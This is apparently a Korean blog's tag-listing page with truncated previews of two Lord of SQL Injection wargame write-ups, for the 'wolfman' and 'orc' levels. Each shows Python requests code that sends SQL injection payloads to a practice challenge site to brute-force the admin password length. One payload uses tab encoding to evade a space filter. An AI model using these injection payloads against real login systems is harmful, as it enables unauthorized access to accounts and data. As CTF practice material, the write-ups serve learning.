lord of sql injection

Web Hacking/LOS

Lord of SQL Injection(LOS) - wolfman

import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD'%09or%09id='admin'%09and%09length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=Fal..

Web Hacking/LOS

Lord of SQL Injection(LOS) - orc

휴가 나가고 싶다 보고싶어 미치겠다 import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "pw=ABCD' or id='admin' and length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, ver..

Lucvs
'lord of sql injection' 태그의 글 목록 (10 Page)